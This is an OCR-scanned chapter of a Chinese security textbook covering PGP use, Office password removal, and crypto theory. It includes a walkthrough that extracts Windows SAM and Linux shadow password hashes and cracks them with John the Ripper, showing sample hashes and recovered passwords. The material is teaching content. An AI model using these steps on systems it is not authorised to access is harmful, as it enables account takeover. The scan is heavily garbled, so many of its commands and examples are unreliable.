Pile Edit Yiew 


ruy 
About PGP. 
License, 


Description 


m 
Options. 


国 PGPaail 


Current Window 
Clipboard 


图 3.18 选择 PGP 图 3. 19 创建 新 密 钥 
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(3) 在 Full name 文本 框 中 输入 想 要 创建 的 公 钥 名 称 ,在 Email address 文本 框 中 输 
入 用 户 的 电子 邮件 地 址 ,如 图 3. 20 Bron 。 


PGP Key Generation Wizard 


Name and Email Assignment 


Every key pai must have a name associated with i The name and email address let 
your correspondent know that the public key they are using belongs to you. 


By associating an email address with your key pair, you wil enable PGP to assist your 
correspondents in selecting the correct public key when communicating with you. 


Email address: — |3147155428qq. con 


c r-5ejr-Ew 


图 3. 20 输入 密 钥 信息 


(4) 在 Passphrase 密码 文本 框 中 输入 长 度 必 须 大 于 等 于 8 位 的 密码 。 在 确认 文本 框 
中 再 输入 一 次 。PGP 的 输入 密码 界面 不 会 显示 你 输入 的 密码 ,前 提 是 勾 选 了 Hide 
Typing, 如 图 3. 21 所 示 。 


Passphrase Assignment 
Neu pille ag wil be preci by a pantphrone I is ingrid re keen ihia 
passphrase secret and do not wite tt down. 


Your passphrase should be at least 8 characters long and should contain 
non-alphabelic characters. 


[Z Hide Typing 


Passphrase: 


<t- V-EN > 取消 


图 3.21 输入 密码 


(5) 密 钥 生成 过 程 ,如 图 3. 22 所 示 。 
(6) 密 钥 生成 完成 ,如 图 3. 23 所 示 。 
C) 密 钥 创建 成 功 后 ,如 图 3. 24 所 示 。 
3. 导出 并 分 发 公 钥 


(D. Keys Export. WHA 3. 25 所 示 。 
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PGP Key Generation Wizard 


Key Generation Progress. 
Key generation can involve multiple steps. Some of these steps may require several. 
minutes to complete. 

Key generation steps: 
v Generating Key 
v Generating Subkey 


Curent status: Done 


Overall progress 


(KE e] 


取消 


图 3.22 密 钥 创 建 中 


PGP Key Generation Wizard 


Completing the PGP Key 
Generation Wizard 


You have successfully generated a PGP key pair. 


You wil now be able to receive secure messages and 
sign documents. 
If you wish to send your new public key to a keyserver, 


simply right click on itin PGPkeys, and use the "Send to" 
menu item. 


Click Finish to close this Wizard and add your new key 
pair to your keyring. 


图 3.23 密 钥 创建 完 


了 PGPkeys 
File Edit View Keys Server Groups Help 
罗 DFE 


Keys Va. Trust Size Description 
S9 Br. ZHOVTOV G14TTSS428qq... — Qj GEEA 2048/1024 DH/DSS key pair! 
日 加 Mr. ZHOWOU G147755428qq con? — User ID 
Ay Mr. ZHDUTOU. 31477554284... DSS exportable 
Mr.ZMOUTOU 4314715542844. com>] 


图 3. 24 密 钥 创 建成 功 
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T PGPkeys 


Sig. Ctrlts 
Set as Default Key CtrltD p 
Add 


Reverify Signatures 


Her Key. Ctrl. 
Share Split. 


Iaport. Ctrl 


1 key(s) selected Properties. Ctrl+I 


图 3.25 导出 公 钥 


(2) 保存 公 钥 为 . asc 文件 ,如 图 3. 26 所 示 。 


了 PGPkeys 


Export Key to File 


[ASCII Key File (9 asc) 


D Include Private Key(s) 
[v] Include & 0 Extensions 


3.26 REFAH 


4. 导入 并 设置 其 他 人 的 公 钥 

双击 对 方 发 来 的 扩展 名 为 . asc 的 公 钥 ,然后 在 密码 输入 框 中 输入 用 户 设置 的 密 钥 对 
密码 对 此 公 钥 进行 签名 认证 。 

5. 对 文件 进行 加 密 

CD 右 击 所 需要 加 密 的 文件 ,PGP 一 Encrypt, 如 图 3. 27 所 示 。 

(2) 可 以 选择 一 个 或 多 个 公 钥 ,上 面 的 窗口 是 备 选 的 公 钥 ,下 面 的 窗口 是 准备 使 用 的 
公 钥 。 将 前 面 导 和 的 公 钥 拖 电 到 Recipients 窗口 ,如 图 3. 28 所 示 。 

(3) 经 过 PGP 短暂 处 理 , 会 在 被 加 密 文件 的 同一 目录 下 生成 一 个 格式 为 “加 密 文件 
名 . pgp” 的 文件 ,如 图 3.29 所 示 。 注 意 : 刚才 使 用 哪个 公 钥 加 密 , 就 只 能 将 该 加 密 文件 发 
送 给 公 钥 所 有 人 ,其 他 人 无 法 解密 ,因为 只 有 该 公 钥 的 所 有 人 才 有 解密 的 私 钥 。 
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fro) 
M Edit with Visual Studio 


ÊS PGPshell - Key Selection Dialog 


ients Val. ze 
[IM ZHOVYOU GI4TTSSA20qq. com> ql 2048/1024 


a ‘Ce ] cm | te | 


[^ Input Is Text 

[^ Yipe Original 

[^ Secure Viewer 

[ Conventional Encryption 
[7 Self Decrypting Archive 


We." 2 


图 3.28 选择 加 密 公 钥 图 3.29 文件 加 密 完成 


6. 对 文件 进行 解密 

CD 双击 加 密 文件 或 者 右键 单 击 加 密 文件 ,选择 PGP 一 Decrypt, 将 出 现 输入 密码 对 
话 框 ,在 此 输入 密码 ,如 图 3. 30 所 示 。 

(2) 如 果 密 码 输入 不 正确 ,会 提示 重新 输入 密码 。 密 码 输入 正确 后 ,会 将 加 密 文件 解 
密 到 指定 的 目录 中 ,如 图 3. 31 Pr. 
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PGPmail — Enter Passphrase 


Message was enctypted to the following public key(s] : 
fir. ZHOUYOU G147755428qq com? (/2048) 


Enter passphrase [or your private key [Z Hide Typing. 


[ONote: Caps Lock is down. Passphrases are case-sensitive. 


Cema ] 


图 3.30 输入 解密 密码 图 3.31 文件 解密 成 功 


3.3 加 密 技 术 


3.3.1 实践 案例 3-3: Office 文件 解密 技术 


(1) 下 载 Office Password Recovery Toolbox 并 安装 ,然后 运行 Office Password 
Recovery Toolbox, 如 图 3. 32 所 示 。 


图 3.32 主 界面 


(2) 单 击 “ 移 除 密码 "按钮 ,会 弹出 “信息 ”对 话 框 ,提示 用 该 软件 解密 的 前 提 条 件 是 能 
够 访问 互联 网 ,然后 单 击 “ 确 定 ” 按 钮 ,如 图 3. 33 所 示 。 


EGR “HA” " Rixler 

Pose AERA e 
D Ris Software. 

BIER Gees 
Internet. 


[ms DL» j 


图 3. 33 选择 解密 文件 进行 解密 
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(3) 等 待 一 定时 间 后 ,提示 文档 成 功 解密 ,如 图 3. 34 所 示 。 
(4) 单 击 “在 Microsoft Excel 中 打开 文档 ”按钮 ,打开 Excel 文件 ,至 此 ,加 密 文件 破 
解 成 功 ,如 图 3. 35 所 示 。 


文件 帮助 
文件 名 
[t] C:\Documents and Settings\Adninistrator\ 不 面 \ce 


o 
一 一 一 一 
E 
F 


工作 表 密码 


Office Password Recovery Toolbox [X] 


d) 该 文档 已 经 被 成 功 解密 4 


CE 


图 3.34 文件 解密 成 功 图 3.35 打开 解密 文件 


3.3.2 实践 案例 3-4: 密码 破解 工具 使 用 


John the Ripper 是 免费 的 开源 软件 ,是 一 个 快速 的 密码 破解 工具 ,用 于 在 已 知 密 文 
的 情况 下 尝试 破解 出 明文 的 破解 密码 软件 ,支持 目前 大 多 数 的 加 密 算法 ,如 DES, MD4 和 
MD5 等 。 它 支持 多 种 不 同类 型 的 系统 架构 ,包括 UNIX, Linux, Windows, DOS 模式 、 
BIOS 和 OpenVMS, 主 要 目的 是 破解 不 够 牢固 的 UNIX/Linux 系统 密码 。 目 前 的 最 新 版 
本 是 John the Ripper 1. 8. 0 版 ,针对 Windows 平台 的 最 新 免费 版 为 John. the Ripper 
1.7.9 版 。John the Ripper 的 官方 网 站 : http://www. openwall. com/john/。 


1. 语法 
命令 行 语法 格式 : john [- 选 项 ][ 密 码 文 件 名 ]。 常 用 选项 及 其 功能 说 明 如 表 3. 1 
所 示 
Ri 命令 行 语法 格式 常用 选项 及 其 功能 说 明 
moo» Wo 

-single single crack 模式 ,使用 配置 文件 中 的 规则 进行 破解 
LT NE 字典 模式 ,从 FILE 或 标准 输入 中 读 取 词 江 
“ülés 打开 字典 模式 的 词汇 表 切 分 规则 
"incrementall —MODE] 使 用 增 量 模式 
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续 表 


选 项 


d $ 


-external= MODE 


打开 外 部 模式 或 单词 过 滤 , 使 用 [List External: MODE] 节 中 定义 的 
外 部 函数 


-stdout[ C LENGTH] 


不 进行 破解 ,仅仅 把 生成 的 .要 测试 是 否 为 口令 的 词汇 输出 到 标准 输 
出 上 


-restore[ = NAME] 


恢复 被 中 断 的 破解 过 程 ,从 指定 文件 或 默认 为 $JOHN/john. rec 的 
文件 中 读 取 破解 过 程 的 状态 信息 


-session— NAME 


将 新 的 破解 会 话 命 名 为 NAME, 该 选项 用 于 会 话 中 断 恢复 和 同时 运 
行 多 个 破解 实例 的 情况 


-status[ = NAME] 显示 会 话 状 态 

-make-charset— FILE 生成 一 个 字符 集 文件 ,覆盖 FILE 文件 ,用 于 增 量 模式 
-show 显示 已 破解 口令 

-test 进行 基准 测试 


-users 一 [-]LOGINIUID[,..] 


选择 指定 的 一 个 或 多 个 账户 进行 破解 或 其 他 操作 ,列表 前 的 减 号 表 
示 反 向 操作 ,说 明 对 列 出 账户 之 外 的 账户 进行 破解 或 其 他 操作 


-groups 一 [-]GID[,..] 


对 指定 用 户 组 的 账户 进行 破解 , 减 号 表示 反 向 操作 ,说 明 对 列 出 组 之 
外 的 账户 进行 破解 


-shells— [-]SHELLL ...] 


对 使 用 指定 SHELL 的 账户 进行 操作 , 减 号 表示 反 向 操作 


-salts=[-JCOUNT 


至 少 对 COUNT 口令 加 载 加 盐 , 减 号 表示 反 向 操作 


-format=NAME 


指定 密 文 格式 名 称 ,为 DES/BSDI/ MD5/BF/AFS/LM 之 一 


-save-memory — LEVEL 


2. 使 用 举例 


设置 内 存 节省 模式 , 当 内 存 不 多 时 选用 这 个 选项 。LEVEL 取 值 在 
1—3 2A 


密码 破解 的 例子 及 其 说 明 如 表 3. 2 所 示 。 


表 3.2 密码 破解 例子 及 其 说 明 


John -single passwd. txt 


1 John -single passwd. txt 


使 用 Single Crack 模式 破解 密码 文件 passwd. txt, 第 二 条 命令 的 选项 使 用 了 简写 形式 


John -single passwdl. txt passwd2. txt passwd3. txt 


2 John -single passwd?. txt 


一 次 破解 多 个 密码 文件 


John -w:words. lst passwd. txt 
John -w: words. lst -rules passwd. txt 
John -w: words. lst -rules passwd?. txt 


指定 一 个 密码 词典 文件 ,并 且 使 用 规则 化 的 方式 
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续 表 
John -i passwd. txt 
j 使 用 增强 模式 ,尝试 将 所 有 可 能 的 字符 组 合作 为 密码 
John -i:Alpha passwd. txt 


使 用 增强 模式 ,尝试 将 除 大 写字 母 外 的 所 有 可 能 的 字符 组 合作 为 密码 


3.3.3 ”实践 案例 3-5: Windows 用 户 密 码 破解 


下 载 john-1. 7. 2. tar. gz, bkhive-1. 1. 1. tar. gz 和 samdump2-1. 1. 1. tar. gz。 将 这 
3 个 文件 放 在 Linux 桌面 上 。 将 Windows 系统 C:\windows\system32\config\ 中 的 两 个 
文件 SAM 和 system 复制 到 Linux 桌面 上 。 在 终端 窗口 执行 如 下 命令 。 

CD 解压 缩 bkhive-1. 1. 1. tar. gz。 


root localhost Desktop]#tar zxvf bkhive- 1.1.1.tar.gz 
root@ localhost Desktop]#od bkhive- 1.1.1 


(2) 编译 bkhive。 

root@ localhost bkhive- 1.1.1]fmake 

用 bkhive 命令 从 system 文件 生成 一 个 system. txt 文件 。 
root@ localhost bkhive- 1.1.1]4./bkhive ./system ./system.txt 

(3) 解压 缩 samdump2-1. 1. 1. tar. gz。 


root@ localhost Desktop]#tar zxvf samdump?- 1.1.1.tar.gz 
root@ localhost Desktop]#0d samdump?- 1.1.1 


(4) 编译 samdump2。 


root localhost samdump?- 1.1.1]#make 


C5) 提取 账号 信息 。 用 samdump?2 命令 从 system. txt 文件 和 sam 文件 生成 一 个 
passwd hashes. txt 文件 ,passwd_hashes. txt 文件 的 内 容 是 最 终 要 被 破解 的 用 户 账 号 
信息 。 

[roote localhost semdum2- 1.1.1]f./semdmp? ./sem ./system.txt > ../passwd hashes.txt 

passwd hashes. txt 文件 的 内 容 如 图 3. 36 所 示 。 


E passwd hashes. trt - BFE 
XED MED FEV MAD ELO HHW 


administrator :1003:3123ace83f459a5faad3b435b51404ee : 767782 fbbdTb75ef92ed9cf9114e27: 


ziguang:1004:dlcasf88ec8549822ad3b435b5140dee :36316975352144£32e 9887 c5TbaT31el:: 


Ej 


图 3.36  passwd hashes. txt 文件 的 内 容 
(6) 使 用 john 破解 Windows 用 户 密码 。 


[root localhost semdump?- 1.1.1]fod .. 
[roote localhost Desktop]#od john- 1.7.2/run 
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[roote localhost run]#./jchn- - incremental:Alpha ././passwd hashes.txt 


在 图 3.37 中 ,使 用 第 四 行 的 命令 对 passwd. hashes. txt 文件 进行 解密 ,两 秒 钟 就 将 
administrator 和 ztguang 用 户 的 密码 破解 出 来 了 。 


XD MO HEV SO FED FUD 


ASDFG (ztg) 
QWERT (Administor) 
guesses: 2 time: 0:00:00:29 c/s: 2620K 


No password hashes loaded 
[rootelocalhost run]# rm john.pot 


rm: 是 否 删除 一 般 文件 john.pot ? y 


ASDFG (ztg) 

QWERT Administor) 
guesses: 2 time: 0:00:00:36 c/s: 2079K 
[rootelocalhost run]# $ 


[rootelocalhost run]# ./john —incremental:Alpha . 
Loaded 2 password hashes with no dilTerent salts 
Warning: MaxLen = 8 is too large for the current hash type, reduced to 7 


[rootelocalhost run] ./john —incremental:Alpha . 


[rootelocalhost run]# ./john —incremental:Alpha . 
Loaded 2 password hashes with no different salts (LM DES [32/32 BS]) 
Warning: MaxLen = 8 is too large for the current hash type, reduced to 7 


trying: QWENK - QWERB 
: A. / passwd hashes. txt (2) 


trying: QWENK — QWERB 


Js -/passwd. hashes. txt Gf] 


«4. ./passwd hashes. txt (d 


图 3.37 使 用 john 破解 Windows 用 户 密码 


第 @ 行 再 次 执行 前 面 的 命令 对 passwd_hashes. txt 文件 进行 解密 ,给 出 了 No 
password hashes loaded 的 提示 ,原因 在 于 已 经 被 破解 的 


密码 会 被 保存 在 john. pot 文件 中 ,这 样 避免 了 


重复 性 的 


工作 ,john. pot 文件 的 内 容 如 图 3. 37 所 示 。 执 行 第 @ 行 
的 命令 将 john. pot 文件 删除 ,再 次 执行 第 @ 行 的 命令 , 结 


果 如 图 3. 38 所 示 。 


3.3.4 实践 案例 3-6: Linux 用 户 密码 破解 


(1) 添加 Linux 用 户 。 


[roote localhost ~ ]fuseradd Root 
[roote localhost ~ ]#passwd Root 
Changing password for user Root. 
新 的 UNIX 口令 。 


[roote localhost ~ ]fuseradd admin 
[roote localhost ~ ]fpasswd admin 


IMO SO EO) MHO FED MOD 


SLMSe3f4e1bd22b5037e : ASDI 
SLNSS42224cdbOf 1c794 
[rootelocalhost run]# $ 


图 3.38 被 破解 的 密码 
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Changing password for user admin. 
(2) 获得 密码 信息 。 

将 如 下 两 行 信息 (位 于 /etc/shadow 文件 中 ) 存 人 /root/Desktop/shadow 文件 。 
Root:$ 1$ KS9tKmMIM$ 1TUKSZn79hGME n MOBIVK/ :13850:0:99999:7::: 

admin:$ 1$ suByWCGTS 1Ug3r52C1o. n NdPXkQr.// :13850:0:99999:7: : : 

(3) 改变 文件 /root/Desktop/shadow 权限 ,只 允许 管理 员 访 问 该 文件 。 

[root8 localhost Desktop]#dmod 700 shadow 


(4) 使 用 john 破解 Linux 用 户 密码 。 

下 面 使 用 密码 词典 来 破解 Linux 用 户 密码 ,password. lst 文件 是 密码 词典 ,包含 可 能 
的 用 户 密码 ,执行 如 图 3. 39 所 示 的 命令 (. /john-w:password. Ist ../../shadow) ,从 结果 
可 知 没有 破解 成 功 ,原因 在 于 密码 词典 不 够 大 。 


MD5 [32/32]) 
trying: zhongguo 


图 3.39 破解 失败 


扩充 password. lst 文件 ,添加 更 多 的 可 能 的 用 户 密码 ,执行 如 图 3. 40 所 示 的 命令 
C. /john--w:password. Ist ../../shadow), 从 结果 可 知 破解 成 功 。 由 此 可 知 ,用 此 种 方法 
时 ,关键 要 有 大 的 密码 词典 ,不 过 密码 词典 越 大 ,破解 时 用 的 时 间 越 多 。 


root@localhost:~/Desktop/john-1.7.2 


[rootelocalhost run]# ./john —w:password.lst ../../shadow = 
Loaded 2 password hashes with 2 different salts (FreeBSD MD5 [32/32]) | 
— Hi/"admini]&WiJjcatdog | H 
LH 
s 


goodvery (Roo WHIRoot € 7goodvery | 
1:01 $ c/s: trying: goodvery 


guesses: 2 time: 0:00:00: 


3.40 破解 成 功 


破解 成 功 后 john. pot 文件 的 内 容 为 如 下 两 行 所 示 。 


$ 1$ suBYyWLET$ 1Ug3r52C10. GNdfxkOr//:catdog 
$ 1$ KS9tKmMS 1TUKsZn79PMININOBV/ :goodvery 


3.4 密码 技术 


密码 技术 是 信息 安全 的 核心 技术 。 密 码 技术 是 集 数 学 .计算 机 科学 .电子 与 通信 等 多 
学 科 于 一 身 的 交叉 学 科 。 它 不 仅 能 够 保证 机 密 性 信息 的 加 密 ,而 且 能 够 实现 数字 签名 LEE 
份 验证 和 系统 安全 等 功能 ,是 迅速 发 展 的 重要 学 科 之 一 。 


3.4.1 明文 、 密 文 .算法 和 密 钥 
明文 : 信息 的 原始 形式 ( 记 为 P) 。 
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密 文 : 明文 经 过 变换 加 密 后 的 形式 ( 记 为 C)。 

加 密 : 由 明文 变 成 密 文 的 过 程 称 为 加 密 , 加 密 通 常 是 由 加 密 算法 实现 的 。 

解密 : 由 密 文 还 原 成 明文 的 过 程 称 为 解密 ,解密 通常 是 由 解密 算法 来 实现 的 。 

密 钥 : 为 了 有 效 地 控制 加 密 和 解密 算法 的 实现 ,在 其 处 理 过 程 中 要 有 通信 双方 所 掌 
握 的 专门 信息 参与 ,这 种 专门 信息 称 为 密 钥 ( 记 为 K)。 


3.4.2 密码 体制 


根据 密 钥 的 特点 ,密码 体制 可 以 分 为 对 称 密码 体制 和 非 对 称 密码 体制 。 对 称 密码 体 
制 又 称 为 单 钥 或 私 钥 密 码 体制 , 即 加 密 密 钥 和 解密 密 钥 是 一 样 的 或 彼此 之 间 是 容易 相互 
确定 的 密码 体制 ; 非 对 称 密码 体制 又 称 双 钥 和 公 钥 密码 体制 , 即 加 密 密 钥 和 解密 密 钥 不 
同 ,而 且 从 一 个 难以 推出 另 一 个 的 密码 体制 。 根 据 加 密 方 式 的 不 同 , 私 钥 密 码 又 可 以 分 为 
流 密码 和 分 组 密码 两 类 ,所 谓 流 密码 是 指 将 明文 按 字 符 逐 位 加 密 的 密码 体制 ,而 分 组 密码 
是 将 明文 分 组 再 进行 加 密 的 密码 体制 。 

在 私 钥 密码 体制 下 ,密码 需要 实现 经 过 安全 的 密码 通道 由 发 信 方 传 给 收 信 方 。 因 此 ， 
这 种 密码 体制 的 安全 性 就 是 密 钥 的 安全 性 。 这 种 密码 体制 的 优点 是 : 安全 性 高 ,加 密 速 
度 快 。 其 缺点 是 : 随 着 网 络 规模 的 扩大 , 密 钥 的 管理 成 为 一 个 难点 ;无 法 解决 消息 确认 问 
题 ; 缺 乏 自动 检测 密 钥 泄露 的 能 力 。 最 有 影响 的 私 钥 密码 体制 是 1977 年 美国 国家 标准 局 
颁布 的 DES 算法 。 

在 公 钥 密码 体制 下 ,加 密 密 钥 和 解密 密 钥 是 不 同 的 ,此 时 不 需要 安全 通道 来 传送 密 
码 。 这 种 密码 的 优点 是 不 存在 密 钥 管 理 的 问题 ,并 可 以 拥有 数字 签名 等 新 功能 。 它 的 缺 
点 是 算法 一 般 比较 复杂 ,加 解密 速度 慢 。 最 有 名 的 公 钥 密码 体制 是 1977 年 由 Xivest、 
Shamir 和 Adieman 提出 的 RSA 密码 体制 。 

因此 ,网 络 中 的 加 密 普 遍 采 用 双 钥 和 单 钥 密 码 相 结合 的 混合 加 密 体制 , 即 加 解密 是 采 
用 私 钥 密码 ,密码 传送 则 采用 公 钥 密码 。 这 样 既 解决 了 密 钥 管理 的 困难 ,又 解决 了 加 解密 
速度 慢 的 问题 。 


3.4.3 古典 密码 学 


相对 来 说 ,古典 密码 技术 比较 简单 ,是 常规 的 加 密 技 术 。 它 们 大 多 数 采用 手工 或 机 械 
操作 来 对 明文 进行 加 密 和 解密 。 在 科学 技术 迅速 发 展 的 今天 ,这 些 密码 技术 中 的 绝 大 多 
数 已 无 安全 可 言 ,但 是 古典 密码 技术 的 设计 思想 对 于 理解 , 设 汁 以 及 分 析 现 代 密 码 学 是 十 
分 有 用 的 。 古 典 密码 技术 根据 其 基本 原理 大 体 上 可 以 分 为 两 类 : 替换 密码 技术 和 换 位 密 
码 技术 。 

1. 最 早 的 密码 

公元 前 400 年 ,斯 巴 达 人 就 发 明了 * 塞 塔 式 密码 ”, 即 把 长 条 纸 螺旋 形 地 斜 绕 在 一 个 多 
棱 棒 上 ,将 文字 沿 棒 的 水 平方 向 从 左 到 右 书 写 , 写 一 个 字 旋 转 一 下 , 写 完 一 行 再 另 起 一 行 
从 左 到 右 写 ,直到 写 完 。 解 下 来 后 , 纸 条 上 的 文字 就 是 密 文 。 这 是 最 早 的 密码 技术 。 
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2. 凯撒 密码 

将 替换 密码 用 于 军事 用 途 的 第 一 个 文件 记载 是 凯撒 著 的 (高 卢 记 》。 凯撒 描述 他 如 何 
将 密 信 送 到 正 处 在 被 围困 、 濒 临 投降 的 西 塞 罗 。 其 中 罗马 字母 被 替换 成 希腊 字母 使 得 敌 
人 根本 无 法 看 懂 信 息 。 

苏 托尼 厄 斯 在 公元 二 世纪 写 的 《凯撒 传 ) 中 对 凯撒 用 过 的 其 中 一 种 蔡 换 密码 做 了 详细 
的 描写 。 凯 撤 只 是 简单 地 把 信息 中 的 每 一 个 字母 用 字母 表 中 的 该 字母 后 的 第 三 个 字母 代 
替 。 这 种 密码 替换 通常 叫做 凯撒 移 位 密码 ,或 简单 地 说 ,凯撒 密码 。 尽 管 苏 托 尼 厄 斯 仅 提 
到 三 个 位 置 的 凯 撤 移 位 ,但 显然 从 1 到 25 个 位 置 的 移 位 我 们 都 可 以 使 用 。 因 此 ,为 了 使 
密码 有 更 高 的 安全 性 ,单字 母 蔡 换 密码 就 出 现 了 。 

明码 表 : ABCDEFGHIJKLMNOPQRSTUVWXYZ 

密码 表 : QWERTYUIOPASDFGHJKLZXCVBNM 

明文 . FO REST 

ZX: YGK TLZ 

原理 : abcedfghijkImnopqrstuvwxyz 

defghijklmnopqrstuvwxyzabc 

明文 : Hello,every one! 

密 文 : Khoor,hyhub rqh! 

只 需 重 排 密码 表 二 十 六 个 字母 的 顺序 ,允许 密码 表 是 明码 表 的 任意 一 种 重 排 , 密 钥 就 
会 增加 到 四 千 亿 亿 亿 多 种 ,我们 就 有 超过 4X10” 种 密码 表 , 破 解 就 变 得 很 困难 。 

换 位 密码 也 称 为 排列 组 合 密码 , 它 最 大 的 特点 是 不 需 对 明文 字母 做 任何 变换 ,只 需 对 
明文 字母 的 顺序 按 密 钥 的 规律 相应 的 排列 组 合 后 输出 ,然后 形成 密 文 。 此 种 加 密 方法 保 
密 的 程度 较 高 ,但 其 最 大 的 缺点 是 密 文 呈现 字母 自然 出 现 频率 ,破译 者 只 要 稍 加 统计 即 可 
识别 出 此 类 加 密 方法 ,然后 采取 先 假定 密 铀 长 度 的 方法 ,对 密 文 进行 排列 组 合 ,借助 计算 
机 的 高 速 运算 能 力 及 常用 字母 的 组 合 规律 ,也 可 以 进行 不 同 程度 破译 。 令 26 个 字母 分 别 
对 应 于 整数 0 一 25,a=1,b=2…y=25,z 一 0。 凯 撤 加 密 变 换 实际 上 是 : c= 十 & mod 26 。 
其 中 mm 是 明文 对 应 的 数据 ,c 是 与 明文 对 应 的 密 文 数据 ,上 是 加 密 用 的 参数 , 叫 密 钥 。 当 上 
取 0 时 ,c 二 m, 即 不 发 生 移 位 。data security 对 应 数据 序列 : 4,1,20,1,19,5,3,21,18,9， 
20,25,k=5 时 ,得 密 文 序列 : 9,6,25,6,24,10,8,0,23,14,25,4。 如 果 选 取 ki .As 两 个 参 
数 ,其 中 心 与 26 互 素 , 令 c 三 hm 十 k, mod 26。 这 种 变换 称 为 仿 射 变换 。 


3.4.4 对 称 加 密 算 法 


对 称 加 密 算 法 是 应 用 较 早 的 加 密 算法 ,技术 成 熟 。 在 对 称 加 密 算法 中 ,数据 发 信 方 将 
明文 (原始 数据 ) 和 加 密 密 钥 一 起 经 过 特殊 加 密 算法 处 理 后 ,使 其 变 成 复杂 的 加 密 密 文 发 
送出 去 。 收 信 方 收 到 密 文 后 ,车 想 解 读 原文 , 则 需要 使 用 加 密 用 过 的 密 钥 及 相同 算法 的 道 
算法 对 密 文 进行 解密 ,才能 使 其 恢复 成 可 读 明 文 。 在 对 称 加 密 算 法 中 ,使 用 的 密 钥 只 有 一 
个 ,发 收 信 双 方 都 使 用 这 个 密 钥 对 数据 进行 加 密 和 解密 ,这 就 要 求解 密 方 事 先 必 须知 道 加 
密 密 钥 。 
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对 称 加 密 算法 的 特点 是 算法 公开 、 计 算 量 小 ,加密 速 度 快 以 及 加 密 效率 高 。 不 足 之 处 
是 ,交易 双方 都 使 用 同样 钥匙 ,安全 性 得 不 到 保证 。 此 外 ,每 对 用 户 每 次 使 用 对 称 加 密 算 
法 时 ,都 需要 使 用 其 他 人 不 知道 的 唯一 钥匙 ,这 会 使 得 发 收 信 双 方 所 拥有 的 钥匙 数量 呈 几 
何 级 数 增长 , 密 钥 管理 成 为 用 户 的 负担 。 对 称 加 密 算 法 在 分 布 式 网 络 系统 上 使 用 较为 困 
难 , 主 要 是 因为 密 钥 管理 困难 ,使 用 成 本 较 高 。 而 与 公开 密 钥 加 密 算法 比 起 来 ,对 称 加 密 
算法 能 够 提供 加 密 和 认证 却 缺乏 了 签名 功能 ,使 得 使 用 范围 有 所 缩小 。 在 计算 机 专 网 系 
统 中 广泛 使 用 的 对 称 加 密 算 法 有 DES, IDEA3DES, BI, Wfish, RCS 和 AES 等 。 

DES(Data Encryption Standard) 是 在 20 世纪 70 年 代 中 期 由 美国 IBM 公司 提出 来 
的 , 且 被 美国 国家 标准 局 公布 为 数据 加 密 标准 的 一 种 分 组 加 密 法 。 

DES 属于 分 组 加 密 法 ,而 分 组 加 密 法 就 是 对 一 定 大 小 的 明文 或 密 文 来 做 加 密 或 解密 
动作 。 在 这 个 加 密 系统 中 ,其 每 次 加 密 或 解密 的 分 组 大 小 均 为 64 位 ,所 以 DES 没有 密码 
扩充 问题 。 对 明文 做 分 组 切割 时 ,可 能 最 后 一 个 分 组 会 小 于 64 位 ,此 时 要 在 此 分 组 之 后 
附加 0。 另 一 方面 ,DES 所 用 的 加 密 或 解密 密 钥 也 是 64 位 大 小 ,但 因 其 中 8 个 位 用 来 做 
奇偶 校 验 ,所 以 64 位 中 真正 起 密 钥 作用 的 只 有 56 位 。 加 密 与 解密 所 使 用 的 算法 除了 子 
密 钥 的 顺序 不 同 之 外 ,其 他 部 分 则 是 完全 相同 的 。 


3.4.5. 非 对 称 加 密 算 法 


非 对 称 密 码 算法 是 指 加 密 和 解密 数据 使 用 两 个 不 同 的 密 钥 , 即 加 密 和 解密 的 密 钥 是 
不 对 称 的 ,这 种 密码 系统 也 称 为 公 钥 密码 系统 PKCCPublie Key Cryptosystem) 。 公 钥 密 
码 学 的 概念 首先 是 由 Diffie 和 Hellman 两 人 在 1976 年 发 表 的 一 篇 名 为 《密码 学 的 新 方 
向 ) 的 著名 论文 中 提出 的 ,并 引起 很 大 的 禾 动 。 该 论文 曾 获得 IEEE 信息 论 学 会 的 最 佳 论 
文 奖 。 

与 对 称 密码 算法 不 同 的 是 , 非 对 称 密码 算法 将 随机 产生 两 个 密 钥 : 一 个 用 于 加 密 明 
文 ,其 密 钥 是 公开 的 , 称 为 公 钥 ; 另 一 个 用 来 解密 密 文 , 其 密 钥 是 秘密 的 , 称 为 私 钥 。 

如 果 两 个 人 使 用 非 对 称 密码 算法 传输 机 密 信息 , 则 发 信 方 首先 要 获得 收 信者 的 公 尼 
并 使 用 收 信 方 的 公 钥 加 密 原文 ,然后 将 密 文 传输 给 收 信 方 。 收 信 方 使 用 自己 的 私 钥 才能 
解密 密 文 。 由 于 加 密 密 钥 是 公开 的 ,不 需要 建立 额外 的 安全 信道 来 分 发 密 钥 ,而 解密 密 钥 
是 由 用 户 自己 保管 的 ,与 对 方 无 关 , 从 而 避免 了 在 对 称 密码 系统 中 容易 产生 的 任何 一 方 单 
方面 密 钥 泄露 问题 以 及 分 发 密 钥 时 的 不 安全 因素 和 额外 的 开销 。 非 对 称 密码 算法 的 特点 
是 安全 性 高 、 密 钥 易 于 管理 ,缺点 是 计算 量 大 .加 密 和 解密 速度 慢 。 因 此 , 非 对 称 密 码 算法 
比较 适合 于 加 密 短 信息 。 在 实际 应 用 中 ,通常 采用 由 非 对 称 密码 算法 和 对 称 密码 算法 构 
成 混合 密码 系统 ,发 挥 各 自 的 优势 。 使 用 对 称 密码 算法 来 加 密 数据 ,加 密 速度 快 ;使 用 非 
对 称 密码 算法 来 加 密 对 称 密码 算法 的 密 钥 ,形成 高 安全 性 的 密 钥 分 发 信道 ,同时 还 可 以 用 
来 实现 数字 签名 和 身份 验证 机 制 。 

在 非 对 称 密码 算法 中 ,最 常用 的 是 RSA 算法 。RSA 是 被 研究 得 最 广泛 的 公 钥 算法 ， 
从 提出 到 现在 已 近 二 十 年 ,经 历 了 各 种 攻击 的 考验 ,逐渐 为 人 们 接受 ,普遍 认为 是 目前 最 
优秀 的 公 钥 方案 之 一 。 
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3.4.6 ”混合 加 密 算法 


双 钥 密码 的 缺点 是 密码 算法 一 般 比 较 复杂 ,加 密 和 解密 速度 较 慢 。 因 此 ,实际 网 络 中 
的 加 密 多 采用 双 钥 密码 和 单 钥 密 码 相 结合 的 混合 加 密 体制 , 即 加 密 和 解密 时 采用 单 钥 密 
码 , 密 钥 传 送 时 采用 双 钥 密码 。 这 样 既 解决 了 密 钥 管理 的 困难 ,又 解决 了 加 密 和 解密 速度 
慢 的 问题 。 


3.5 ” 课 后 体会 与 练习 


1. 下 列 哪 项 不 是 密码 技术 发 展 的 一 个 阶段 ( Js 


A. 古典 密码 B. 近代 密码 C. 凯撒 密码 D. 现代 密码 
2. DES 属于 ( ju 

